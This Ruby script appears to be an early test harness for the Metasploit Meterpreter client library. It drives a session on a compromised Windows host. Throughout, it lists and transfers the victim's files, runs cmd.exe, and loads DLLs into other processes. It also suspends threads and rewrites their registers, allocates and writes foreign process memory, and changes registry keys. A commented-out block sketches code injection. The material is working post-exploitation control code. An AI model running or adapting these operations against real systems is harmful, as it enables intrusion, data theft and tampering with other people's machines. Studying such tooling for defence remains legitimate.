#!/usr/bin/ruby -I../../lib require 'Rex/Post' netconf = false ui = false net = false fseek = false dir = true process = false registry = false copy = false sock = TCPSocket.new('', 12345) client = Rex::Post::Meterpreter::Client.new(sock) client.core.use( 'Module' => 'Stdapi') puts "Client interface:" client.dump_extension_tree.each { |x| puts "\t#{x}" } puts "\n\n" if (net) s = client.net.create_channel( 'PeerHost' => '', 'PeerPort' => '80', 'Proto' => 'tcp') puts "writing 'GET / HTTP/1.0'..." s.write("GET / HTTP/1.0\r\n\r\n") puts "reading in 20 bytes from the socket:\n#{s.read(20)}" s.close end if (copy) puts "Uploading...\n" client.fs.file.upload("c:\\personal\\temp\\mirror", "/bin/cat", "/tmp/dog") puts "Downloading...\n" client.fs.file.download("/tmp/test", "c:\\personal\\temp\\ati3duag.dll", "c:\\personal\\temp\\blah.asm", "c:\\personal\\temp\\boa.tar.gz") end if (netconf) puts "Routes:\n\n" client.net.config.each_route { |route| puts route.pretty } puts "\n\nInterfaces:\n\n" client.net.config.each_interface { |interface| puts interface.pretty } client.net.config.add_route('', '', '') puts "after adding route\n\n" client.net.config.each_route { |route| puts route.pretty } client.net.config.remove_route('', '', '') puts "after removing route\n\n" client.net.config.each_route { |route| puts route.pretty } end if (ui) input = false puts "idle time: #{client.ui.idle_time}" sleep 60 puts "idle time: #{client.ui.idle_time}" if (input) puts "disabling" # client.ui.disable_keyboard client.ui.disable_mouse sleep 60 puts "enabling" # client.ui.enable_keyboard client.ui.enable_mouse puts "done" end end if (fseek) f = client.fs.file.new("c:\\personal\\temp\\hm.c") puts "current position: #{f.tell}" puts "some text:\n#{f.read}" puts "current position: #{f.tell}" f.seek(0, IO::SEEK_SET) puts "current position: #{f.tell}" puts "some text again:\n#{f.read}" f.seek(40, IO::SEEK_SET) puts "eof? #{f.eof}" puts "current position: #{f.tell}" puts "some text again:\n#{f.read}" begin puts "some text again:\n#{f.read}" puts "some text again:\n#{f.read}" rescue EOFError puts "got eof" rescue puts "got other" end puts "eof? #{f.eof}" end if (dir) puts "Testing dir...\n\n" puts "%WINDIR% is #{client.fs.file.expand_path('%WINDIR%')}" puts "Getting contents of C:\\" client.fs.dir.foreach("C:\\") { |name| puts "\t#{name}\n" } puts "working directory: #{client.fs.dir.pwd}" client.fs.dir.chdir("..") puts "working directory: #{client.fs.dir.getwd}" client.fs.dir.chdir("c:\\windows") puts "working directory: #{client.fs.dir.pwd}" client.fs.dir.mkdir("c:\\personal\\temp\\tester") client.fs.dir.unlink("c:\\personal\\temp\\tester") s = client.fs.filestat.new("C:\\Windows\\notepad.exe") puts s.pretty puts client.fs.file.stat("C:\\windows\\notepad.exe").mtime # open a file and read in some text f = client.fs.file.new("C:\\personal\\temp\\hm.c") puts "some text:\n #{f.read}" f.close end if (process) puts "Testing process...\n\n" puts "exploited pid is #{client.sys.process.getpid}" puts "exploited name is #{client.sys.process.open.name}" puts "exploited path is #{client.sys.process.open.path}" ## # # enumeration testing # ## debug_pid = client.sys.process['calc.exe'] puts "pid of calc.exe is #{debug_pid}" #client.sys.process.kill(debug_pid) ## # # Load a library in another process # ## p = client.sys.process.open(debug_pid) base = p.image.load('zipfldr.dll') printf "loaded zipfldr.dll into #{p.pid} at %.8x\n", base addr = p.image.get_procedure_address('zipfldr.dll', 'RouteTheCall') printf "addr of RouteTheCall is: %.8x\n", addr p.image.unload(base) puts "unloaded it" ## # # Execution # ## p = client.sys.process.execute("cmd.exe", nil, { 'Channelized' => true }) d = p.io.read puts "read from cmd.exe:\n#{d}" p.io.write("dir\n") d = p.io.read puts "read from cmd.exe:\n#{d}" ## # # threads # ## p = client.sys.process.open(debug_pid) p.thread.each_thread { |id| puts "thread id: #{id}" thread = p.thread.open(id) puts "suspending..." thread.suspend puts "registers:\n" puts thread.pretty_regs thread.set_regs( 'eax' => 0x41414141, 'ebx' => 0xdeadbeef) puts thread.pretty_regs puts "resuming..." thread.resume puts "closing..." thread.close } ## # # code injection # ## #buf = p.memory.allocate(400) #p.memory.write(buf, "\xcc") #p.thread.create(buf) #p.close ## # # image testing # ## exp = client.sys.process.open addr = exp.image.load('wininet.dll') printf "wininet.dll is loaded at: %.8x\n", addr exp.image.unload(addr) printf "LoadLibraryA is at: %.8x\n", exp.image.get_procedure_address('kernel32.dll', 'LoadLibraryA') printf "ntdll.dll base is at: %.8x\n", exp.image['ntdll.dll'] ## # # memory testing # ## p = client.sys.process.open(debug_pid, PROCESS_ALL) addr = p.memory.allocate(400, PROT_WRITE | PROT_READ) printf "allocated memory at %.8x\n", addr p.memory.write(addr, 'this is a test yo') data = p.memory.read(addr, 10) printf "read memory from %.8x (#{data.length}): #{data.to_s}\n", addr info = p.memory.query(addr) printf "addr: %.8x (size=%d, prot=%.8x)\n", addr, info['RegionSize'], info['Protect'] if (p.memory.writable?(addr)) puts "memory is writable like it should be\n" end p.memory.protect(addr, info['RegionSize'], PROT_READ) if (!p.memory.writable?(addr)) puts "memory is NOT writable like it should be\n" else puts "memory is writable but it should not be\n" end begin p.memory.write(addr, 'test again') rescue puts "caught exception like expected during write #{$!}" end p.close # attach to the exploited process exp = client.sys.process.open addr = exp.memory.allocate(400, PROT_WRITE) exp.memory.lock(addr, 4096) exp.memory.unlock(addr, 4096) exp.close end if (registry) puts "Testing registry...\n\n" regkey = client.sys.registry.open_key(HKEY_CURRENT_USER, 'Software', KEY_ALL_ACCESS) puts "hkey is #{regkey.hkey}" regkey.set_value('test123', REG_SZ, 'yo what up') regkey.set_value('testdword', REG_DWORD, '666') val = regkey.query_value('test123') val2 = regkey.query_value('testdword') puts "value name: #{val.name} type: #{val.type} data: '#{val.data}'" puts "value name: #{val2.name} type: #{val2.type} data: '#{val2.data}'" val.set('ho ho ho') val.delete regkey.enum_key.each { |key| puts "child key: #{key}" } regkey.enum_value.each { |value| puts "child value: #{value.name}" } k = regkey.create_key('TestKey') k.close regkey.delete_key('TestKey') regkey.close end while (true) printf("sup\n") select nil, nil, nil, 4 end